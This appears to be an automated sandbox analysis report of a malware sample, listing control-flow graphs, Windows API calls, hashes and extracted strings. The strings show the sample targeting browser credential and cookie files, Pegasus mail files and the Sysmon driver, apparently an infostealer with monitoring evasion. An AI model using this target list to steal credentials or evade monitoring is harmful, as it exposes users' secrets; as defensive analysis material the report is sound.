5576 42bf87-42bfa6 call 42ca0d 5537->5576 5577 42bc77-42bc7c 5537->5577 5572 42bc36-42bc3b 5538->5572 5573 42bf6c-42bf77 5538->5573 5574 42be0a-42be0f 5539->5574 5575 42c08d-42c0b0 5539->5575 5560 42bd4b-42bd50 5540->5560 5561 42c018-42c027 5540->5561 5558 42bf09-42bf29 5541->5558 5559 42bb6f-42bb74 5541->5559 5578 42baf1-42baf6 5542->5578 5579 42be9f-42bec5 call 42ad82 5542->5579 5552 42bfd2-42bfe8 5543->5552 5553 42bce8-42bced 5543->5553 5562 42bbb2-42bbb7 5544->5562 5563 42bf39-42bf5c 5544->5563 5564 42bd79-42bd7e 5545->5564 5565 42c02c-42c033 5545->5565 5566 42ba60-42ba65 5546->5566 5567 42be86-42be8f 5546->5567 5548 42bcb6-42bcbb 5547->5548 5549 42bfab-42bfcd call 42b9c5 5547->5549 5548->5517 5582 42bcc1-42bcd8 call 447e24 5548->5582 5549->5517 5598 42c010-42c013 5550->5598 5602 42beff-42bf04 5550->5602 5581 42c04f 5551->5581 5597 42bb54 5551->5597 5552->5517 5553->5517 5585 42bcf3-42bd08 5553->5585 5554->5517 5587 42ba16-42ba32 call 438e28 5555->5587 5588 42c0bf-42c0c4 5555->5588 5556->5517 5589 42bd23-42bd3b 5556->5589 5557->5598 5611 42c00b 5557->5611 5558->5598 5604 42bf2f-42bf34 5558->5604 5559->5517 5601 42bb7a-42bb97 5559->5601 5560->5517 5590 42bd56-42bd69 5560->5590 5561->5517 5562->5517 5603 42bbbd-42bbca 5562->5603 5563->5598 5605 42bf62-42bf67 5563->5605 5564->5517 5591 42bd84-42bdaf call 42b9c5 5564->5591 5565->5517 5566->5517 5592 42ba6b-42bacb call 40e14e * 4 5566->5592 5567->5598 5599 42be95-42be9a 5567->5599 5568->5517 5606 42bbf0-42bc15 call 42ca0d 5568->5606 5583 42c086-42c08b 5569->5583 5584 42c0b7-42c0ba 5569->5584 5570->5517 5593 42bdd0-42bdef call 42b9ae 5570->5593 5580 42c045-42c04d 5571->5580 5571->5581 5572->5517 5610 42bc41-42bc61 5572->5610 5573->5598 5607 42bf7d-42bf82 5573->5607 5574->5517 5594 42be15-42be1c 5574->5594 5575->5584 5586 42c0b2 5575->5586 5576->5517 5577->5517 5612 42bc82-42bca6 call 42b9c5 5577->5612 5578->5517 5595 42bafc-42bb11 call 40b7bb 5578->5595 5579->5598 5635 42becb-42bed0 5579->5635 5580->5569 5580->5581 5613 42c050 5581->5613 5582->5517 5583->5584 5584->5517 5585->5517 5586->5584 5587->5517 5588->5517 5616 42c0ca-42c0d9 call 447a80 5588->5616 5589->5517 5590->5517 5591->5605 5639 42bdb5 5591->5639 5592->5517 5593->5598 5641 42bdf5-42bdfa 5593->5641 5594->5517 5646 42bb16-42bb23 5595->5646 5597->5517 5598->5517 5599->5598 5601->5517 5602->5598 5603->5517 5604->5598 5605->5598 5606->5604 5644 42bc1b 5606->5644 5607->5598 5610->5605 5625 42bc67 5610->5625 5611->5598 5612->5517 5613->5613 5625->5598 5635->5598 5639->5598 5641->5598 5644->5598 5646->5517
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *.CNM$*.PM$*.PMF$*.PML$*.PMN$*.USR$*.WPM$*CACHE.PM$C:\PMAIL$Ku^%$Ku^%$Mail Clients\Pegasus$kernel32.dll
                                                            • API String ID: 0-3904125897
                                                            • Opcode ID: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                            • Instruction ID: 84dac617f37148c4bf89ffca1ba6cb6ddcd73cd34940f6261eccf690c7d83b59
                                                            • Opcode Fuzzy Hash: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                            • Instruction Fuzzy Hash: E0E10BB1F0012A8BCF249E99A88167F7B74EB05354FA4052BE511EB361E77C8D409BDB

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5655 40a928-40a970 call 447047 call 438e28 5661 40a973-40a97b 5655->5661 5662 40a9f5-40a9fa 5661->5662 5663 40a97d-40a982 5661->5663 5664 40aa00-40aa05 5662->5664 5665 40aa93-40aa98 5662->5665 5666 40aa43-40aa48 5663->5666 5667 40a988-40a98d 5663->5667 5670 40aa0b-40aa10 5664->5670 5671 40ab4c-40ab51 5664->5671 5668 40abb7-40abbc 5665->5668 5669 40aa9e-40aaa3 5665->5669 5672 40ab86-40ab8b 5666->5672 5673 40aa4e-40aa53 5666->5673 5674 40a993-40a998 5667->5674 5675 40aaee-40aaf3 5667->5675 5686 40ad42-40ad47 5668->5686 5687 40abc2-40abc7 5668->5687 5680 40ac73-40ac78 5669->5680 5681 40aaa9-40aaae 5669->5681 5684 40ac20-40ac25 5670->5684 5685 40aa16-40aa1b 5670->5685 5676 40acd4-40acd9 5671->5676 5677 40ab57-40ab5c 5671->5677 5682 40ab91-40ab96 5672->5682 5683 40ad0b-40ad10 5672->5683 5690 40aa59-40aa5e 5673->5690 5691 40ac3b-40ac40 5673->5691 5678 40abfe-40ac03 5674->5678 5679 40a99e-40a9a3 5674->5679 5688 40aca4-40aca9 5675->5688 5689 40aaf9-40aafe 5675->5689 5692 40ae4c-40ae4f 5676->5692 5693 40acdf-40ace4 5676->5693 5694 40ab62-40ab67 5677->5694 5695 40af0a-40af24 5677->5695 5710 40b010-40b029 call 447047 5678->5710 5711 40ac09-40ac0e 5678->5711 5696 40ad73-40ad84 5679->5696 5697 40a9a9-40a9ae 5679->5697 5718 40b084-40b0ae call 438e28 5680->5718 5719 40ac7e-40ac83 5680->5719 5714 40ae90-40aea2 call 40a928 5681->5714 5715 40aab4-40aab9 5681->5715 5700 40ab9c-40aba1 5682->5700 5701 40af4e-40af66 5682->5701 5698 40ad16-40ad1b 5683->5698 5699 40b0bf-40b0e2 5683->5699 5712 40ac2b-40ac30 5684->5712 5713 40b02e-40b050 lstrcatW lstrlenW 5684->5713 5702 40aa21-40aa26 5685->5702 5703 40adcf-40ae09 call 40b81c call 40a928 5685->5703 5704 40b0f1-40b101 5686->5704 5705 40ad4d-40ad52 5686->5705 5706 40afb5-40afd9 5687->5706 5707 40abcd-40abd2 5687->5707 5722 40b0b3-40b0ba 5688->5722 5723 40acaf-40acb4 5688->5723 5720 40aeb1-40aee5 5689->5720 5721 40ab04-40ab09 5689->5721 5708 40aa64-40aa69 5690->5708 5709 40ae1a-40ae25 5690->5709 5716 40b055-40b075 5691->5716 5717 40ac46-40ac4b 5691->5717 5764 40ae50 5692->5764 5693->5661 5745 40acea-40acfb 5693->5745 5724 40af33-40af49 call 447047 5694->5724 5725 40ab6d-40ab72 5694->5725 5731 40af26 5695->5731 5732 40af2b-40af2e 5695->5732 5754 40b009-40b00e 5696->5754 5755 40ad8a 5696->5755 5746 40a9b4-40a9b9 5697->5746 5747 40ad8f-40adbf call 40b129 call 40b7bb 5697->5747 5698->5661 5749 40ad21-40ad32 5698->5749 5729 40b0e9-40b0ec 5699->5729 5750 40b0e4 5699->5750 5727 40aba7-40abac 5700->5727 5728 40af6b-40af9c NtCreateFile call 438e28 5700->5728 5701->5661 5751 40aa2c-40aa31 5702->5751 5752 40ae0e-40ae15 5702->5752 5703->5661 5704->5661 5705->5661 5753 40ad58-40ad6e call 447047 5705->5753 5706->5661 5733 40abd8-40abdd 5707->5733 5734 40afde-40b007 call 40a928 call 40b129 5707->5734 5756 40ae6d-40ae8b 5708->5756 5757 40aa6f-40aa74 5708->5757 5709->5692 5761 40ae27-40ae2f 5709->5761 5710->5661 5735 40ac14-40ac1b 5711->5735 5736 40b106-40b10b 5711->5736 5737 40ae61-40ae68 5712->5737 5738 40ac36 5712->5738 5713->5661 5759 40aea5-40aeac 5714->5759 5715->5759 5760 40aabf-40aac4 5715->5760 5743 40b077 5716->5743 5744 40b07c-40b07f 5716->5744 5717->5661 5739 40ac51-40ac6e lstrlenW 5717->5739 5718->5661 5719->5661 5740 40ac89-40ac9f call 447047 5719->5740 5720->5729 5730 40aeeb-40aef0 5720->5730 5762 40aef5-40af05 5721->5762 5763 40ab0f-40ab14 5721->5763 5722->5661 5723->5661 5742 40acba-40accf lstrcatW 5723->5742 5724->5661 5725->5661 5765 40ab78-40ab81 5725->5765 5767 40ae31-40ae47 5727->5767 5768 40abb2 5727->5768 5789 40afa1-40afb0 5728->5789 5729->5661 5730->5729 5731->5732 5732->5744 5733->5661 5770 40abe3-40abee 5733->5770 5734->5744 5734->5754 5735->5661 5736->5661 5781 40b111-40b118 5736->5781 5737->5661 5738->5661 5739->5661 5740->5661 5742->5661 5743->5744 5744->5661 5745->5744 5775 40ad01-40ad06 5745->5775 5746->5661 5776 40a9bb-40a9e5 5746->5776 5747->5744 5807 40adc5-40adca 5747->5807 5749->5744 5778 40ad38-40ad3d 5749->5778 5750->5729 5751->5661 5779 40aa37-40aa3e 5751->5779 5752->5661 5753->5661 5754->5744 5755->5744 5756->5661 5757->5661 5783 40aa7a-40aa8e 5757->5783 5759->5661 5760->5661 5785 40aaca-40aade 5760->5785 5761->5737 5761->5767 5762->5661 5763->5661 5786 40ab1a-40ab3c 5763->5786 5764->5764 5765->5759 5767->5661 5768->5661 5770->5744 5788 40abf4-40abf9 5770->5788 5775->5744 5776->5744 5792 40a9eb-40a9f0 5776->5792 5778->5744 5779->5661 5794 40b11a-40b11c 5781->5794 5795 40b11e 5781->5795 5783->5661 5785->5744 5798 40aae4-40aae9 5785->5798 5786->5744 5799 40ab42-40ab47 5786->5799 5788->5744 5789->5661 5792->5744 5801 40b121-40b128 5794->5801 5795->5801 5798->5744 5799->5744 5807->5744
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,76230880,?,0040B7CA,0040C9F4,?,?,?), ref: 0040AC5E
                                                            • lstrcatW.KERNEL32(?,\??\,?,?,?,?,?,?,?,?,76230880,?,0040B7CA,0040C9F4,?,?), ref: 0040ACC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcatlstrlen
                                                            • String ID: \??\$kernel32.dll$ntdll.dll
                                                            • API String ID: 1475610065-320376045
                                                            • Opcode ID: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                            • Instruction ID: cf05d70ef52a95d5e776fd44e962e356ae6502797ff445894325f4a97f5a2809
                                                            • Opcode Fuzzy Hash: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                            • Instruction Fuzzy Hash: E302C5B1E443198ADF288A58C842ABFB670EB14310F25493BE515FB3E0D3798D519B9F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5960 42fd35-42fd3e 5961 42fd45-42fd4d 5960->5961 5962 42fdb5-42fdba 5961->5962 5963 42fd4f-42fd54 5961->5963 5964 42fe70-42fe75 5962->5964 5965 42fdc0-42fdc5 5962->5965 5966 42fe25-42fe2a 5963->5966 5967 42fd5a-42fd5f 5963->5967 5968 42ff83-42ff88 5964->5968 5969 42fe7b-42fe80 5964->5969 5970 42ff0a-42ff0f 5965->5970 5971 42fdcb-42fdd0 5965->5971 5974 42ff30-42ff35 5966->5974 5975 42fe30-42fe35 5966->5975 5972 42fec5-42feca 5967->5972 5973 42fd65-42fd6a 5967->5973 5982 4301bf-4301d6 5968->5982 5983 42ff8e-42ff93 5968->5983 5976 42fe86-42fe8b 5969->5976 5977 430095-4300a0 5969->5977 5990 430130-43016d call 42fd35 call 430228 5970->5990 5991 42ff15-42ff1a 5970->5991 5980 42fdd6-42fddb 5971->5980 5981 430004-43002c call 42f278 5971->5981 5984 42fed0-42fed5 5972->5984 5985 4300e4-4300ef 5972->5985 5986 42fd70-42fd75 5973->5986 5987 42ffcc-42ffd3 5973->5987 5978 430195-4301b6 5974->5978 5979 42ff3b-42ff40 5974->5979 5988 430051-430075 call 42f278 5975->5988 5989 42fe3b-42fe40 5975->5989 6004 4300b0-4300d4 5976->6004 6005 42fe91-42fe96 5976->6005 5999 4301dd-4301e0 5977->5999 6009 4300a6-4300ab 5977->6009 5998 4301b8-4301bd 5978->5998 5978->5999 5992 42ff46-42ff78 call 42f278 5979->5992 5993 4301e5-4301ea 5979->5993 5995 42fde1-42fde6 5980->5995 5996 430037-43004c 5980->5996 6019 43018e-430193 5981->6019 6039 430032 5981->6039 5982->5999 6002 4301d8 5982->6002 5983->5961 5997 42ff99-42ffbc 5983->5997 6007 43010a-43012b 5984->6007 6008 42fedb-42fee0 5984->6008 6012 4300f1-4300f9 5985->6012 6013 4300fb 5985->6013 6010 42fd7b-42fd80 5986->6010 6011 42ffd8-42fff9 call 42f278 5986->6011 5987->5961 5988->5961 6000 42fe46-42fe4b 5989->6000 6001 43007a-430090 5989->6001 5990->5999 6046 43016f-430174 5990->6046 6014 42ff20-42ff25 5991->6014 6015 430176-43018c 5991->6015 5992->6009 6043 42ff7e 5992->6043 5993->5961 6023 4301f0-43021b call 42f625 * 3 5993->6023 5995->5961 6018 42fdec-42fe16 5995->6018 5996->5961 5997->5999 6020 42ffc2-42ffc7 5997->6020 5998->5999 5999->5961 6000->5961 6021 42fe51-42fe5c call 42f625 6000->6021 6001->5961 6002->5999 6004->5999 6028 4300da-4300df 6004->6028 6005->5961 6025 42fe9c-42fec0 call 42fd35 6005->6025 6007->5961 6008->5961 6027 42fee6-42ff05 call 42f278 6008->6027 6009->5999 6010->5961 6029 42fd82-42fd9e call 42f625 * 2 6010->6029 6011->6046 6047 42ffff 6011->6047 6012->6007 6012->6013 6030 4300fc 6013->6030 6014->6013 6031 42ff2b 6014->6031 6015->5999 6015->6019 6034 42fe18 6018->6034 6035 42fe1d-42fe20 6018->6035 6019->5999 6020->5999 6045 42fe61-42fe6b 6021->6045 6057 430220-430227 6023->6057 6025->5961 6027->5961 6028->5999 6055 42fda3-42fdb3 6029->6055 6030->6030 6031->5961 6034->6035 6035->5961 6039->5999 6043->5999 6045->5961 6046->5999 6047->5999 6055->5961
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$cert9.db$cookies.sqlite$formhistory.sqlite$key4.db$logins.json$places.sqlite
                                                            • API String ID: 4038537762-2469458786
                                                            • Opcode ID: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                            • Instruction ID: d1eb3a7c9248dbe3af820f863548cf4fb9ed3ca77677979f9304c8b24649e330
                                                            • Opcode Fuzzy Hash: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                            • Instruction Fuzzy Hash: 9FB128B1E1012A97CF288E58A95567F7674AB45300FE4163BE816FB390E73DCA05878B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6193 4262a1-4262b8 6194 4262bc-4262c4 6193->6194 6195 4262c6-4262cb 6194->6195 6196 426335-42633a 6194->6196 6197 4262d1-4262d6 6195->6197 6198 42638a-42638f 6195->6198 6199 426340-426345 6196->6199 6200 4263f4-4263f9 6196->6200 6203 426448-42644d 6197->6203 6204 4262dc-4262e1 6197->6204 6205 4264e3-4264e8 6198->6205 6206 426395-42639a 6198->6206 6201 4264a5-4264aa 6199->6201 6202 42634b-426350 6199->6202 6207 426529-42652e 6200->6207 6208 4263ff-426404 6200->6208 6209 4264b0-4264b5 6201->6209 6210 426675-42667a 6201->6210 6211 426356-42635b 6202->6211 6212 4265a4-4265a9 6202->6212 6217 426453-426458 6203->6217 6218 426648-42664d 6203->6218 6213 426582-426587 6204->6213 6214 4262e7-4262ec 6204->6214 6215 4266bb-4266c0 6205->6215 6216 4264ee-4264f3 6205->6216 6219 4263a0-4263a5 6206->6219 6220 4265ea-4265ef 6206->6220 6221 426534-426539 6207->6221 6222 4266ed-4266f2 6207->6222 6223 426616-42661b 6208->6223 6224 42640a-42640f 6208->6224 6241 426847-426862 RtlAdjustPrivilege call 4279e0 6209->6241 6242 4264bb-4264c0 6209->6242 6247 426680-426685 6210->6247 6248 42695e-42696d 6210->6248 6243 426361-426366 6211->6243 6244 4265de-4265e5 6211->6244 6231 4265af-4265b4 6212->6231 6232 4268fc-426903 6212->6232 6229 4268e3-4268f7 6213->6229 6230 42658d-426592 6213->6230 6233 4262f2-4262f7 6214->6233 6234 42670f-426719 6214->6234 6255 426972-42699f call 424c44 call 422177 6215->6255 6256 4266c6-4266cb 6215->6256 6249 4268a4-4268ab 6216->6249 6250 4264f9-4264fe 6216->6250 6235 426824-426836 6217->6235 6236 42645e-426463 6217->6236 6245 426942-426959 6218->6245 6246 426653-426658 6218->6246 6251 42676a-426791 6219->6251 6252 4263ab-4263b0 6219->6252 6237 4265f5-4265fa 6220->6237 6238 426908-42690f 6220->6238 6253 4268c6-4268de 6221->6253 6254 42653f-426544 6221->6254 6227 4266f8-4266fd 6222->6227 6228 4269ae-4269cc call 4279e0 6222->6228 6239 426621-426626 6223->6239 6240 426914-426939 6223->6240 6225 4267d4-4267f3 call 422817 6224->6225 6226 426415-42641a 6224->6226 6275 4269a6-4269a9 6225->6275 6315 4267f9-4267fe 6225->6315 6272 426803-42681f 6226->6272 6273 426420-426425 6226->6273 6227->6194 6274 426703-42670a 6227->6274 6228->6194 6229->6194 6230->6194 6258 426598-42659f 6230->6258 6231->6194 6259 4265ba-4265d9 call 426a09 6231->6259 6232->6194 6260 426729-42673a 6233->6260 6261 4262fd-426302 6233->6261 6234->6275 6276 42671f-426724 6234->6276 6235->6194 6278 42683b-426842 6236->6278 6279 426469-42646e 6236->6279 6237->6194 6263 426600-426611 GetPEB 6237->6263 6238->6194 6239->6194 6264 42662c-426643 call 43f000 6239->6264 6240->6275 6288 42693b-426940 6240->6288 6304 426867-426872 6241->6304 6281 4264c6-4264cb 6242->6281 6282 426877-426894 6242->6282 6265 42673f-42675a 6243->6265 6266 42636c-426371 6243->6266 6244->6194 6245->6194 6246->6194 6267 42665e-426670 6246->6267 6247->6194 6268 42668b-4266ab call 426a42 call 41eba8 6247->6268 6248->6194 6249->6194 6284 4268b0-4268c1 6250->6284 6285 426504-426509 6250->6285 6251->6275 6277 426797-42679c 6251->6277 6269 4267a1-4267c4 6252->6269 6270 4263b6-4263bb 6252->6270 6253->6194 6286 4269d1-4269d6 6254->6286 6287 42654a-426572 call 424995 6254->6287 6255->6275 6325 4269a1 6255->6325 6256->6194 6271 4266d1-4266e8 6256->6271 6258->6194 6259->6244 6260->6194 6261->6194 6291 426304-42632a call 422817 call 4244e4 6261->6291 6263->6194 6264->6194 6265->6275 6299 426760-426765 6265->6299 6266->6194 6295 426377-42637b 6266->6295 6267->6194 6268->6275 6331 4266b1-4266b6 6268->6331 6269->6275 6300 4267ca-4267cf 6269->6300 6270->6194 6297 4263c1-4263ef LoadLibraryA 6270->6297 6271->6194 6272->6194 6273->6194 6298 42642b-426443 call 41eba8 call 41f9a4 6273->6298 6274->6194 6275->6194 6276->6275 6277->6275 6278->6194 6279->6194 6301 426474-426495 call 41eb3f 6279->6301 6281->6194 6303 4264d1-4264de call 422817 6281->6303 6282->6275 6305 42689a-42689f 6282->6305 6284->6194 6285->6194 6306 42650f-426524 6285->6306 6286->6194 6293 4269dc-4269e3 6286->6293 6287->6275 6317 426578-42657d 6287->6317 6288->6275 6291->6305 6333 426330 6291->6333 6320 42637e-426385 6295->6320 6297->6194 6298->6258 6299->6275 6300->6275 6301->6275 6329 42649b-4264a0 6301->6329 6303->6274 6304->6194 6305->6275 6306->6194 6315->6275 6317->6275 6320->6194 6325->6275 6329->6275 6331->6275 6333->6275
                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: A8r$SysmonDrv$dll$fltl$ib.d
                                                            • API String ID: 1029625771-1616023887
                                                            • Opcode ID: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                            • Instruction ID: eb42a9731a47ced65949ee17454b9c50096d91694aa44b165600d0182d074a5f
                                                            • Opcode Fuzzy Hash: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                            • Instruction Fuzzy Hash: E7E1D5B1709220DBCB24AB18E68572E76E5EB80304FA65D1FF485CB350D63DC9829B5B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M0@$UL6T$VL6T
                                                            • API String ID: 0-769956738
                                                            • Opcode ID: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                            • Instruction ID: 5b652a97159c1cfdc4854cd4c98ad9d0b798284c57e6c6df073e9b00d242a01e
                                                            • Opcode Fuzzy Hash: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                            • Instruction Fuzzy Hash: 0032A871D1051B8BCF289A98878D57EB6B0AB54350B24063BE915FB3D0D3BCCE419B9B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6767 40b129-40b139 6768 40b13c-40b144 6767->6768 6769 40b146-40b14b 6768->6769 6770 40b17e-40b183 6768->6770 6773 40b1b7-40b1bc 6769->6773 6774 40b14d-40b152 6769->6774 6771 40b215-40b21a 6770->6771 6772 40b189-40b18e 6770->6772 6777 40b220-40b225 6771->6777 6778 40b359-40b35e 6771->6778 6779 40b194-40b199 6772->6779 6780 40b2db-40b2e0 6772->6780 6781 40b1c2-40b1c7 6773->6781 6782 40b32c-40b331 6773->6782 6775 40b2a5-40b2aa 6774->6775 6776 40b158-40b15d 6774->6776 6797 40b2b0-40b2b5 6775->6797 6798 40b584-40b5a7 call 40a928 6775->6798 6783 40b163-40b168 6776->6783 6784 40b3c8-40b3cd 6776->6784 6787 40b4a9-40b4c2 6777->6787 6788 40b22b-40b230 6777->6788 6793 40b360-40b365 6778->6793 6794 40b395-40b3b8 6778->6794 6789 40b40f-40b414 6779->6789 6790 40b19f-40b1a4 6779->6790 6785 40b601-40b607 call 40a928 6780->6785 6786 40b2e6-40b2eb 6780->6786 6795 40b4c7-40b4cc 6781->6795 6796 40b1cd-40b1d2 6781->6796 6791 40b646-40b65b 6782->6791 6792 40b337-40b33c 6782->6792 6811 40b503-40b532 6783->6811 6812 40b16e-40b173 6783->6812 6801 40b6d3-40b6fc 6784->6801 6802 40b3d3-40b3d8 6784->6802 6843 40b60c-40b616 6785->6843 6813 40b2f1-40b2f6 6786->6813 6814 40b61b-40b641 call 438e28 6786->6814 6787->6768 6803 40b236-40b23b 6788->6803 6804 40b569-40b574 6788->6804 6806 40b710-40b73f call 40b129 6789->6806 6807 40b41a-40b41f 6789->6807 6817 40b541-40b55e 6790->6817 6818 40b1aa-40b1af 6790->6818 6799 40b746-40b749 6791->6799 6808 40b661-40b666 6791->6808 6819 40b342-40b347 6792->6819 6820 40b66b-40b6a6 call 40b81c call 40a928 6792->6820 6821 40b6ab-40b6ca 6793->6821 6822 40b36b-40b370 6793->6822 6794->6799 6800 40b3be-40b3c3 6794->6800 6815 40b4d2-40b4f3 6795->6815 6816 40b74e-40b753 6795->6816 6823 40b494-40b497 6796->6823 6824 40b1d8-40b1dd 6796->6824 6809 40b5b2-40b5f1 call 40b81c call 40b7bb 6797->6809 6810 40b2bb-40b2c0 6797->6810 6798->6808 6858 40b5ad 6798->6858 6799->6768 6800->6799 6849 40b703-40b70b call 40b81c 6801->6849 6850 40b6fe 6801->6850 6802->6768 6827 40b3de-40b404 call 40b129 6802->6827 6803->6768 6842 40b241-40b295 call 40b129 call 40b81c 6803->6842 6804->6799 6838 40b57a-40b57f 6804->6838 6806->6799 6836 40b741 6806->6836 6807->6768 6828 40b425-40b470 call 438e28 call 447e24 6807->6828 6808->6799 6809->6799 6882 40b5f7-40b5fc 6809->6882 6810->6768 6845 40b2c6-40b2cc 6810->6845 6832 40b534 6811->6832 6833 40b539-40b53c 6811->6833 6812->6768 6830 40b175-40b17c 6812->6830 6813->6768 6847 40b2fc-40b321 6813->6847 6814->6768 6815->6799 6831 40b4f9-40b4fe 6815->6831 6816->6768 6826 40b759-40b7ba NtReadFile call 438e28 NtClose 6816->6826 6817->6836 6837 40b564 6817->6837 6834 40b1b5 6818->6834 6835 40b2cf-40b2d6 6818->6835 6819->6768 6851 40b34d-40b354 6819->6851 6820->6768 6821->6799 6848 40b6cc-40b6d1 6821->6848 6822->6768 6853 40b376-40b381 6822->6853 6829 40b498 6823->6829 6824->6768 6839 40b1e3-40b210 call 447047 call 447e24 6824->6839 6827->6836 6875 40b40a 6827->6875 6886 40b475-40b48f 6828->6886 6829->6829 6830->6768 6831->6799 6832->6833 6833->6768 6834->6768 6835->6768 6836->6799 6837->6799 6838->6799 6839->6768 6842->6799 6885 40b29b-40b2a0 6842->6885 6843->6768 6845->6835 6847->6808 6863 40b327 6847->6863 6848->6799 6849->6768 6850->6849 6851->6768 6853->6823 6866 40b387-40b38f 6853->6866 6858->6799 6863->6799 6866->6787 6866->6794 6875->6799 6882->6799 6885->6799 6886->6768
                                                            APIs
                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,7626F770,7626F770), ref: 0040B792
                                                            • NtClose.NTDLL ref: 0040B7B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileRead
                                                            • String ID: LK$Y[$ntdll.dll
                                                            • API String ID: 752142053-4222218168
                                                            • Opcode ID: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                            • Instruction ID: 4487220ceab9a8d4c25bfe658470c8f7c93894071a863f051833b6fbd766e42f
                                                            • Opcode Fuzzy Hash: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                            • Instruction Fuzzy Hash: C0E1BDB29043058BDB249F69C59516EBAE1EB85314F25893FE485FB3D0E33C89418B9F
                                                            APIs
                                                              • Part of subcall function 0041F916: VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                            • NtQueryInformationProcess.NTDLL(000000FF,0000001E,?,00000004,00000000), ref: 004223A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Query$InformationProcessVirtual
                                                            • String ID: ]^4$^^4$^^4$^^4
                                                            • API String ID: 1364735940-2923853987
                                                            • Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                            • Instruction ID: e1f5519adcfceb975286f451de33aaf8cbb4e2bcda804772fdea06b08d6dcce1
                                                            • Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                            • Instruction Fuzzy Hash: CD510B31B08271ABDB24891CA68097E62D45B44314FA44D2BFDD9EB328C2ADCDD6974F
                                                            APIs
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00433288
                                                            • GetSystemMetrics.USER32(00000001), ref: 004333C3
                                                            • GetSystemMetrics.USER32(00000000), ref: 0043341E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MetricsSystem$Create
                                                            • String ID: DISPLAY
                                                            • API String ID: 1087689917-865373369
                                                            • Opcode ID: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
